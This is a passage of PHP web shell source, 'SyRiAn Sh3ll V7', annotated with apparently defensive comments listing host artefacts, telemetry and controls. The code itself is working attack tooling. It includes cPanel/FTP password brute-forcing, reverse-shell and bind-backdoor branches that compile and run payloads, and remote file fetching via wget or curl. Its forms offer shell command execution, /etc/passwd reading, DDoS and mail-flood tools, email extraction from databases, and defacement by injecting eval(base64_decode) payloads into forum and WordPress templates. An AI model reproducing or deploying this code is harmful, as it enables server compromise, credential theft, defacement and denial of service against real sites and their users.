        # pair and both values are written into the response body. Other errors are ignored.
  2028. elseif ( curl_errno($ch) == 0 )
  2029. {
  2030. print "[+] Cracking Success With Username ($user) and Password ($pass)";
  2031. }
  2032. curl_close($ch);
  2033. }
  2034. if(isset($submit) && !empty($submit))
  2035. {
        # Driver for the two credential checks above: splits the posted user and password lists
        # on newlines and tries every user/password combination against $target.
        # The three checks below only print a message; none of them stops execution, so the
        # loops still run when a list is empty.
  2036. if(empty($users) && empty($pass))
  2037. {
  2038. print "[-] Please Check The Users or Password List Entry . . .";
  2039. }
  2040. if(empty($users))
  2041. {
  2042. print "[-] Please Check The Users List Entry . . .";
  2043. }
  2044. if(empty($pass))
  2045. {
  2046. print "[-] Please Check The Password List Entry . . ";
  2047. }
  2048. $userlist=explode("\n",$users);
  2049. $passlist=explode("\n",$pass);
  2050. print "[~]# Cracking Process Started, Please Wait ...";
        # Attempt count is (number of users) x (number of passwords), issued back to back with
        # set_time_limit(0) in effect for the request, so a single POST can produce a long burst
        # of logins. Elsewhere on this page the form pre-fills the user list from a listing of
        # /var/mail, i.e. local mailbox names on the compromised host.
  2051. foreach ($userlist as $user)
  2052. {
  2053. $pureuser = trim($user);
  2054. foreach ($passlist as $password )
  2055. {
  2056. $purepass = trim($password);
        # $cracktype comes from the request and selects the protocol; any other value makes the
        # loops run without contacting anything.
  2057. if($cracktype == "ftp")
  2058. {
  2059. ftp_check($target,$pureuser,$purepass,$connect_timeout);
  2060. }
  2061. if ($cracktype == "cpanel")
  2062. {
  2063. cpanel_check($target,$pureuser,$purepass,$connect_timeout);
  2064. }
  2065. }
  2066. }
  2067. }
  2068. }
  2069. # --------------------------
  2070. # Back Connection
  2071. #---------------------------
  2072. else if($_POST['backconn'])
  2073. {
        # Reverse-connection branch: reads a destination address and port from POST and starts a
        # helper program with those two arguments. The payload strings ($back_connect_c,
        # $back_connect) and the helpers tulis(), Exe() and which() are defined outside this
        # excerpt; from their use here tulis() appears to write a string to a file and Exe() to
        # run a shell command (confirm against their definitions).
        # Host artefacts to look for in the script's working directory: bcc.c (removed after
        # compilation), bcc, bcp.
        # Process telemetry: gcc, chmod and perl started by the web server account, followed by a
        # background process holding an outbound connection.
        # Controls that break this branch: no compiler on web hosts, restricting PHP's
        # process-spawning functions, and default-deny egress for the web server account.
  2074. if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  2075. {
  2076. $ip = trim($_POST['ip']);
  2077. $port = trim($_POST['backport']);
        # C variant: source is dropped, compiled, made world-accessible (777), the source removed.
  2078. tulis("bcc.c",$back_connect_c);
  2079. Exe('gcc -o bcc bcc.c');
  2080. Exe('chmod 777 bcc');
  2081. @unlink('bcc.c');
  2082. Exe("./bcc ".$ip." ".$port." &");
  2083. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2084. }
  2085. elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  2086. {
  2087. $ip = trim($_POST['ip']);
  2088. $port = trim($_POST['backport']);
        # Perl variant: script is dropped as "bcp" and run through the perl binary located by which().
  2089. tulis("bcp",$back_connect);
  2090. Exe("chmod +x bcp");
  2091. $p2=which("perl");
  2092. Exe($p2." bcp ".$ip." ".$port." &");
  2093. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2094. }
  2095. }
  2096. # --------------------------
  2097. # Bind Connection
  2098. #---------------------------
  2099. else if($_POST['bind'])
  2100. {
        # Bind-listener branch: reads a port and a password value from POST and starts a helper
        # program in the background. The payload strings ($port_bind_bd_c, $port_bind_bd_pl) and
        # the helpers tulis(), Exe() and which() are defined outside this excerpt; the payloads
        # presumably open a listening socket on the given port (confirm against their text).
        # Host artefacts to look for in the script's working directory: bdc.c (removed after
        # compilation), bdc, bdp.
        # Process telemetry: gcc, chmod, perl and "ps aux" started by the web server account, and
        # a new listening socket owned by that account.
        # Controls that break this branch: default-deny inbound filtering so only the published
        # service ports are reachable, no compiler on web hosts, and restricting PHP's
        # process-spawning functions.
  2101. if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  2102. {
  2103. $port = trim($_POST['port']);
  2104. $passwrd = trim($_POST['bind_pass']);
  2105. tulis("bdc.c",$port_bind_bd_c);
  2106. Exe('gcc -o bdc bdc.c');
  2107. Exe('chmod 777 bdc');
  2108. @unlink("bdc.c");
  2109. Exe("./bdc ".$port." ".$passwrd." &");
        # The process list is searched to decide which status message to show.
        # Triage note: eregi() does not exist on PHP 7 and later, so on such a runtime the request
        # fails at this call, after the helper above has already been launched. The absence of a
        # status message therefore does not show that nothing was started.
  2110. $scan = Exe("ps aux");
  2111. if(eregi("./bdc $por",$scan))
  2112. {
  2113. $msg = "Process found running, backdoor setup successfully.";
  2114. }
  2115. else
  2116. {
  2117. $msg = "Process not found running, backdoor not setup successfully.";
  2118. }
  2119. }
  2120.  
  2121. elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  2122. {
  2123. $port = trim($_POST['port']);
  2124. $passwrd = trim($_POST['bind_pass']);
        # Perl variant: script is dropped as "bdp" and run through the perl binary located by which().
  2125. tulis("bdp",$port_bind_bd_pl);
  2126. Exe("chmod 777 bdp");
  2127. $p2=which("perl");
  2128. Exe($p2." bdp ".$port." &");
  2129. $scan = Exe("ps aux");
  2130. if(eregi("$p2 bdp $port",$scan))
  2131. {
  2132. $msg = "Process found running, backdoor setup successfully.";
  2133. }
  2134. else
  2135. {
  2136. $msg = "Process not found running, backdoor not setup successfully.";
  2137. }
  2138. }
  2139. }
  2140.  
  2141.  
  2142. echo "</textarea>";
  2143. if($_POST['editFileSubmit'])
  2144. {
  2145. echo "<input type='hidden' value='".$_POST['editFile']."' name='file2edit' /> ";
  2146. echo "<input type='submit' value='Save' name='saveEditedFile'>";
  2147. }
  2148. echo "</form>
  2149.  
  2150. <!-- Main Table -->
  2151. <table width='100%'><tr>
  2152. <td width='30%' height=30>
  2153. <!-- End Of Main Table -->
  2154. <!-- Commands Alias-->
  2155. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2156. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2157. <td style='background-color:#666;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input
  2158.  
  2159. name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></form>
  2160. <!-- End Of Commands Alias-->
  2161. </td>
  2162. <td width='30%' height=30>
  2163. <!-- Command Line -->
  2164. <form method='POST'>
  2165. <table width='100%' height='72' border='0' id='Box'><tr>
  2166. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2167. <td style='background-color:#666;padding-left:10px;'>Command Line </td></tr><tr><td height='45' colspan='2'>
  2168. <input type='text' name='cmd' id='commandLine' value='dir' size=59>
  2169. <input type='text' name='directory' value=".getcwd()." size=59>
  2170. <input name='Execute' id='Execute' type='submit' value='Execute' >
  2171. </td></tr></table></form>
  2172. <!-- End Of Command Line -->
  2173. </td>
  2174. <td width='30%' height=30>
  2175. <!-- Edit File -->
  2176. <form method=POST>
  2177. <table width='100%' height='72' border='0' id='Box'><tr>
  2178. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2179. <td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr><td height='45' colspan='2'>
  2180. <input type='text' name='editFile' size=59>
  2181. <input name='editFileSubmit' type='submit' value='Edit'>
  2182. </td></tr></table></form>
  2183. <!-- End Of Edit File -->
  2184. </td>
  2185. </tr>
  2186. <tr>
  2187. <td width='30%'>
  2188. <!-- Chmod Force -->
  2189. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2190. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2191. <td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><tr><td height='45' colspan='2'>
  2192. <input type='text' name='fileName' value='index.php' size=48>
  2193. <br/><input type='text' name='per' value='0644' size='10'>
  2194. <input type=submit value='Change Now !' name='changePermission'>
  2195. </td></tr></table></form>
  2196. <!-- End Of Chmod Force -->
  2197. </td>
  2198. <td>
  2199. <!-- Get File -->
  2200. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2201. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2202. <td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr><td height='45' colspan='2'>
  2203. <input type='text' name='fileUrl' size='59' value='http://www.'>
  2204. <select name=getType>
  2205. <option value=wget>wget</option>
  2206. <option value='curl -o'>curl -o</option>
  2207. <option value=get>get</option>
  2208. <option value='lynx -source'>lynx -source</option>
  2209. </select>
  2210. <input name=getFile type=submit value='Get File' >
  2211. </td></tr></table></form>
  2212. <!-- End Of Get File -->
  2213. </td>
  2214. <td>
  2215. <!-- Bind Connection -->
  2216. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2217. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2218. <td style='background-color:#666;padding-left:10px;'>Bind Connection </td></tr><tr><td height='45' colspan='2'>
  2219. <input class='inputz' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["HTTP_HOST"])."'>
  2220. <input type='text' name='port' size='26' value='443'>
  2221. <select class='inputz' size='1' name='use'>
  2222. <option value='Perl'>Perl</option><option value='C'>C</option>
  2223. </select>
  2224. <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'>
  2225. </td></tr></table></form>
  2226. <!-- End Of Bind Connection -->
  2227. </td>
  2228. </tr>
  2229. <tr>
  2230. <td>
  2231. <!-- CGI perl -->
  2232. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2233. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2234. <td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr><td height='45' colspan='2'>
  2235. <input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
  2236. <input type='submit' name='generatePel' value='Generate'></td></tr></table></form>
  2237. <!-- End Of CGI perl -->
  2238. </td><td>
  2239. <!-- Forbidden -->
  2240. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2241. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2242. <td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr><td height='45' colspan='2'>
  2243. <input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/>
  2244. <select name='403'>
  2245. <option value='DirectoryIndex'>DirectoryIndex</option>
  2246. <option value='HeaderName'>HeaderName</option>
  2247. <option value='TXT'>TXT</option>
  2248. <option value='404'>404</option>
  2249. <option value='ReadmeName'>ReadmeName</option>
  2250. <option value='footerName'>footerName</option>
  2251. </select>
  2252. <input type='submit' value='Generate' name='generateForbidden'>
  2253. </td></tr></table></form>
  2254. <!-- End Of Forbidden -->
  2255. </td>
  2256. <td>
  2257. <!-- Back Connection -->
  2258. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2259. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2260. <td style='background-color:#666;padding-left:10px;'>Back Connection </td></tr><tr><td height='45' colspan='2'>
  2261. <input type='text' name='ip' size='26' value='".GetRealIP()."'>
  2262. <input type='text' name='backport' size='26' value='443'>
  2263. <select name='use'>
  2264. <option value='Perl'>Perl</option>
  2265. <option value='C'>C</option>
  2266. </select>
  2267. <input type='submit' name='backconn' value='Connect'>
  2268. </td></tr></table></form>
  2269. <!-- End Of Back Connection -->
  2270. </td>
  2271. </tr>
  2272. <tr>
  2273. <td>
  2274. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2275. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2276. <td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr><tr><td height='45' colspan='2'>
  2277. <input type='text' name='hashToAnalyze' size=60>
  2278. <input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></table></form>
  2279. </td>
  2280. <td>
  2281. <!-- Eval Code -->
  2282. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2283. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2284. <td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr><td height='45' colspan='2'>
  2285. <input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll V7\";'>
  2286. <input type=submit name=submitEval value=Eval></td></tr></table></form>
  2287. <!-- End Of Eval Code -->
  2288. </td>
  2289. <td>
  2290. <!-- Users & Domains -->
  2291. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2292. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2293. <td style='background-color:#666;padding-left:10px;'>Users & Domains </td></tr><tr><td height='45' colspan='2'>
  2294. <input type='text' name='usersPath' value='".getcwd()."' size='55'/>
  2295. <input type='submit' name='GenerateUsers' Value='Generate'>
  2296. <!-- End Of Users & Domains -->
  2297. </td></tr></table></form>
  2298. </td>
  2299. </tr>
  2300. <tr>
  2301. <td>
  2302. <!-- Reading Files -->
  2303. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2304. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2305. <td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Using PHP Bugs </td></tr><tr><td height='45' colspan='2'>
  2306. <input type='text' value='/etc/passwd' name='file' size=35>
  2307. <input class='buttons' type='submit' name='read' value='Read File'>
  2308. <input class='buttons' type='submit' name='show' value='Show directory'>
  2309. </td></tr></table></form>
  2310. <!-- End Of Reading Files -->
  2311. </td>
  2312. <td>
  2313. <!--Encryption -->
  2314. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2315. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2316. <td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><tr><td height='45' colspan='2'>
  2317. <input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
  2318. <input type='submit' value='Encrypt' name='encryptNow'>
  2319. </td></tr></table></form>
  2320. <!-- End Of Encryption -->
  2321. </td>
  2322. <td>
  2323. <!-- Metasploit RC -->
  2324. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2325. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2326. <td style='background-color:#666;padding-left:10px;'>Metasploit Connection </td></tr><tr><td height='45' colspan='2'>
  2327. <input type='text' size='15' name='ip' value='127.0.0.1'>
  2328. <input type='text' size='5' name='port' value='443'>
  2329. <input type='submit' value='Connect' name='metaConnect'>
  2330. </td></tr></table></form>
  2331. <!-- End Of Metasploit RC -->
  2332. </td>
  2333. </tr>
  2334. <tr>
  2335. <td>
  2336. <!-- DDOS Attacker -->
  2337. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2338. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2339. <td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr><tr><td height='45' colspan='2'>
  2340. <input type='text' name='ipToAttack' size='40' value='Target IP'>
  2341. <input type='text' name='portToAttack' size='20' value='Target PORT'>
  2342. <input type='submit' name='StartAttack' value='Attack'>
  2343. </td></tr></table></form>
  2344. <!-- End Of DDOS Attacker -->
  2345. </td>
  2346. <td>
  2347. <!-- Ports Scanner -->
  2348. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2349. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2350. <td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr><tr><td height='45' colspan='2'>
  2351. <input type='text' name='domainToScanPort' size='50' value='172.0.0.1'> <input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
  2352. </td></tr></table></form>
  2353. <!-- End Of Ports Scanner -->
  2354. </td>
  2355. <td>
  2356. <!-- ACP Finder -->
  2357. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2358. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2359. <td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><tr><td height='45' colspan='2'>
  2360. <input name='hash_lol' class='textbox' type='text' size='30' value='http://www.example.com/'/>
  2361. <input type='text' value='.php' name='extention'/>
  2362. <input name='submit_lol' class='textbox' value='Brute Force Now' type='submit'>
  2363. <!-- End Of ACP Finder -->
  2364. </td></tr></table></form>
  2365. </td>
  2366. </tr>
  2367.  
  2368. <tr>
  2369. <br>
  2370. <td valign='top'>
  2371. <!-- Server ShortCut -->
  2372. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2373. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2374. <td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></tr><tr><td height='45' colspan='2'>
  2375. <input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
  2376. <input type='submit' name='generateSER' value=' Generate '>
  2377. </td></tr></table></form>
  2378. <!-- End Of Server ShoutCut -->
  2379. </td>
  2380. <td valign='top'>
  2381. <!-- Fast Tools -->
  2382. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2383. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2384. <td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><tr><td height='45' colspan='2'>
  2385. <input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
  2386. <input type=submit value='Generate php.ini' name='phpiniGenerate'>
  2387. <input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><br/>
  2388. <input type='submit' value='Finding Config Files' name='configFinderSubmit' />
  2389. <input type='submit' name='showUsers' value='Show Users' />
  2390. </td></tr></table></form>
  2391. <!-- End Of Fast Tools -->
  2392. </td>
  2393. <td valign='TOP'>
  2394. <!-- SQL Reader -->
  2395. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2396. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2397. <td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr><td height='45' colspan='2'>
  2398. <input type='text' value='/etc/passwd' name='file' size='35'><br/>
  2399. <input type='text' name='host' value='127.0.0.1'>
  2400. <input type='text' name='user' value='DB user'>
  2401. <input type='text' name='pass' value='DB pass'>
  2402. <input type=text name='db' value='DB name'>
  2403. <input type='submit' name='sql2Read' value='Read'>
  2404. ";
  2405. if($sql_con)
  2406. {
  2407. echo '<input style="width:300px;" type="text" name="filetoread">
  2408. <input type="submit" value="Read" name="SQLToRead">';
  2409. }
  2410. echo "</td></tr></table></form>
  2411. <!-- End Of SQL Reader -->
  2412. </td>
  2413. </tr>
  2414. <tr>
  2415. <td valign='top'>
  2416. <!-- Mail Storm -->
  2417. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2418. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2419. <td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><tr><td height='45' colspan='2'>
  2420. <textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea>
  2421. <input type='text' name='to' value='Target Email' >
  2422. <input type='text' size='5' name='nom' value='100'>
  2423. <input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
  2424. </td></tr></table></form>
  2425. <!-- End Of Mail Storm -->
  2426. </td>
  2427. <td valign='top'>
  2428. <!-- SQL Query -->
  2429. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2430. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2431. <td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr><td height='45' colspan='2'>
  2432. <input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
  2433. <input type = 'text' name=\"QU_USER\" value='DB User'><br/>
  2434. <input type = 'text' name=\&quot;QU_PASS\&quot; value='DB Pass'>
  2435. <input type=text name=\&quot;QU_DB\&quot; value='DB Name' >
  2436. <textarea name='QU' rows=2 cols=50>SELECT * FROM emp ;</textarea>
  2437. <input name='MySQLQuery' type='submit'>
  2438. </td></tr></table></form>
  2439. <!-- SQL Query -->
  2440. </td>
  2441. <td valign='top'>
  2442. <!-- Email Extractor -->
  2443. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2444. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2445. <td style='background-color:#666;padding-left:10px;'>Email Extractor</td></tr><tr><td height='45' colspan='2'>
  2446. <input type = 'text' name='EM_HOST' value='127.0.0.1'>
  2447. <input type='text' name='EM_USER' value='DB user'>
  2448. <input type ='text' name='EM_PASS' value='DB pass'>
  2449. <input type='text' name='EM_DB' value='DB name'>
  2450. <input type ='text' name='EM_TABLE' value='users Table'>
  2451. <input type ='text' name='EM_COLUMN' value='emails Column'><br/>
  2452. <input name='getEmails' type='submit' id='submit' style='font-weight: value=Extract now !'>
  2453. <input type='submit' value='?' name='emailExtractorHelp' alt='Email Extractor Help'/>
  2454. </td></tr></table></form>
  2455. <!-- End Of Email Extractor -->
  2456. </td>
  2457. </tr>
  2458. <tr>
  2459. <td valign='top'>
  2460. <!-- Zone-H -->
  2461. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2462. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2463. <td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr><tr><td height='45' colspan='2'>";
  2464. echo '<form action="" method="post">
  2465. <input type="text" name="defacer" size="40" value="Attacker" />
  2466. <select name="hackmode">
  2467. <option >--------SELECT--------</option>
  2468. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2469. <option value="2" >undisclosed (new) vulnerability</option>
  2470. <option value="3" >configuration / admin. mistake</option>
  2471. <option value="4" >brute force attack</option>
  2472. <option value="5" >social engineering</option>
  2473. <option value="6" >Web Server intrusion</option>
  2474. <option value="7" >Web Server external module intrusion</option>
  2475. <option value="8" >Mail Server intrusion</option>
  2476. <option value="9" >FTP Server intrusion</option>
  2477. <option value="10" >SSH Server intrusion</option>
  2478. <option value="11" >Telnet Server intrusion</option>
  2479. <option value="12" >RPC Server intrusion</option>
  2480. <option value="13" >Shares misconfiguration</option>
  2481. <option value="14" >Other Server intrusion</option>
  2482. <option value="15" >SQL Injection</option>
  2483. <option value="16" >URL Poisoning</option>
  2484. <option value="17" >File Inclusion</option>
  2485. <option value="18" >Other Web Application bug</option>
  2486. <option value="19" >Remote administrative panel access bruteforcing</option>
  2487. <option value="20" >Remote administrative panel access password guessing</option>
  2488. <option value="21" >Remote administrative panel access social engineering</option>
  2489. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2490. <option value="23" >Access credentials through Man In the Middle attack</option>
  2491. <option value="24" >Remote service password guessing</option>
  2492. <option value="25" >Remote service password bruteforce</option>
  2493. <option value="26" >Rerouting after attacking the Firewall</option>
  2494. <option value="27" >Rerouting after attacking the Router</option>
  2495. <option value="28" >DNS attack through social engineering</option>
  2496. <option value="29" >DNS attack through cache poisoning</option>
  2497. <option value="30" >Not available</option>
  2498. </select>
  2499.  
  2500. <select name="reason">
  2501. <option >--------SELECT--------</option>
  2502. <option value="1" >Heh...just for fun!</option>
  2503. <option value="2" >Revenge against that website</option>
  2504. <option value="3" >Political reasons</option>
  2505. <option value="4" >As a challenge</option>
  2506. <option value="5" >I just want to be the best defacer</option>
  2507. <option value="6" >Patriotism</option>
  2508. <option value="7" >Not available</option>
  2509. </select>
  2510. <textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
  2511. <input type="submit" value="Send Now !" name="SendNowToZoneH" />
  2512. </form>';
  2513. echo "</td></tr></table></form>
  2514. <!-- End Of Zone-H -->
  2515. </td>
  2516. <td valign='top'>
  2517. <!-- Cpanel And FTP BruteForce Attacker -->
  2518. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2519. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2520. <td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteForce </td></tr><tr><td height='45' colspan='2'>
  2521. <textarea rows='12' name='users' cols='23' >";
  2522. @system('ls /var/mail');
  2523. echo "</textarea>
  2524. <textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$
  2525.  
  2526. %^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
  2527. </textarea>
  2528. <input type='text' name='target' size='16' value='127.0.0.1' >
  2529. <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
  2530. <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
  2531. <input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' >
  2532. </td></tr></table></form>
  2533. <!-- End Of Cpanel And FTP BruteForce Attacker -->
  2534. </td>
  2535. <td valign='top'>
  2536. <!-- Upload Files -->
  2537. <form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%' height='72' border='0' id='Box'><tr>
  2538. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2539. <td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr><tr><td height='45' colspan='2'>
  2540. <input type=\"file\" name=\"uploadfile[]\">
  2541. <input type=\"file\" name=\"uploadfile[]\">
  2542. <input type=\"file\" name=\"uploadfile[]\">
  2543. <input type=\"file\" name=\"uploadfile[]\">
  2544. <input type=\"file\" name=\"uploadfile[]\">
  2545. <input type=\"file\" name=\"uploadfile[]\">
  2546. <input type=\"file\" name=\"uploadfile[]\">
  2547. <input type=\"file\" name=\"uploadfile[]\">
  2548. <input type=\"file\" name=\"uploadfile[]\">
  2549. <input type=\"file\" name=\"uploadfile[]\">
  2550. <input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
  2551. </td></tr></table></form>
  2552. <!-- End Of Upload Files -->
  2553. </td></tr>
  2554. </table>
  2555. ";
  2556. if($_POST['changeDirectory'])
  2557. {
        # Changes the script's working directory to a path taken from POST. The two replacements
        # turn doubled backslashes into single ones by way of a space placeholder, which also
        # turns any space in the path into a backslash. chdir() errors are suppressed.
  2558. $directory = $_POST['directory'];
  2559. $directory = @str_replace("\\\\"," ",$directory);
  2560. $directory = @str_replace(" ","\\",$directory);
  2561. @chdir($directory);
  2562. }
  2563. if($_POST['getFile'])
  2564. {
        # Remote-fetch handler: joins the posted tool name and URL, wraps the result in single
        # quotes and passes it to Exe() (defined outside this excerpt; it appears to run a shell
        # command). The form on this page offers wget, "curl -o", get and "lynx -source".
        # Detection: download utilities started by the web server account, outbound requests from
        # that account to unfamiliar hosts, and new files appearing in the web root.
  2565. $fileUrl = $_POST['fileUrl'];
  2566. $getType = $_POST['getType'];
  2567. Exe("'".$getType.$fileUrl."'");
  2568. }
  2569. footer();
  2570. }
  2571. # ---------------------------------------#
  2572. # IndexChanger #
  2573. #----------------------------------------#
  2574. if ($_GET['id']== 'scriptsHack' )
  2575. {
  2576. echo "
  2577. <table width='100%'>
  2578. <tr>
  2579. <td colspan='2'><textarea cols='153' rows='10'>";
  2580. if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
  2581. {
  2582. $host = $_POST['HOST'];
  2583. $user = $_POST['USER'];
  2584. $pass = $_POST['PASS'];
  2585. $db = $_POST['DB'];
  2586. $index = $_POST['INDEX'];
  2587. $prefix = $_POST['PREFIX'];
  2588. if (empty($_POST['HOST']))
  2589. $host = '127.0.0.1';
  2590. $index=str_replace("\'","'",$index);
  2591. @mysql_connect($host,$user,$pass) or die( "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!");
  2592. @mysql_select_db($db) or die ("[-] Database Name Is Wrong !!");
  2593.  
  2594. if($_POST['UpdateIndex'])
  2595. {
  2596. if ($_POST['ScriptType'] == 'vb')
  2597. {
  2598. $full_index = "{\${eval(base64_decode(\'";
  2599. $full_index .= base64_encode("echo \"$index\";");
  2600. $full_index .= "\'))}}{\${exit()}}</textarea>";
  2601. if($_POST['injectFAQ'])
  2602. {
  2603. $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2604. }
  2605. else
  2606. {
  2607. $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'");
  2608. if (!$ok1)
  2609. {
  2610. $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'");
  2611. }
  2612. elseif (!$ok2)
  2613. {
  2614. $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'");
  2615. }
  2616. elseif(!$ok3)
  2617. {
  2618. $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2619. }
  2620. }
  2621. mysql_close();
  2622. if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq )
  2623. {
  2624. update();
  2625. }
  2626. else
  2627. {
  2628. echo "Updating Has Failed !";
  2629. }
  2630. }
  2631. else if ($_POST['ScriptType'] == 'wp')
  2632. {
  2633. $tableName = $prefix."posts" ;
  2634. $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 ");
  2635. if(!$ok1)
  2636. {
  2637. $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 ");
  2638. }
  2639. elseif(!$ok2)
  2640. {
  2641. $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 ");
  2642. }
  2643. mysql_close();
  2644. if ($ok1 || $ok2 || $ok3)
  2645. {
  2646. update();
  2647. }
  2648. else
  2649. {
  2650. echo "Updating Has Failed !";
  2651. }
  2652. }
  2653. else if ($_POST['ScriptType'] == 'jos')
  2654. {
  2655. $jos_table_name = $prefix."menu" ;
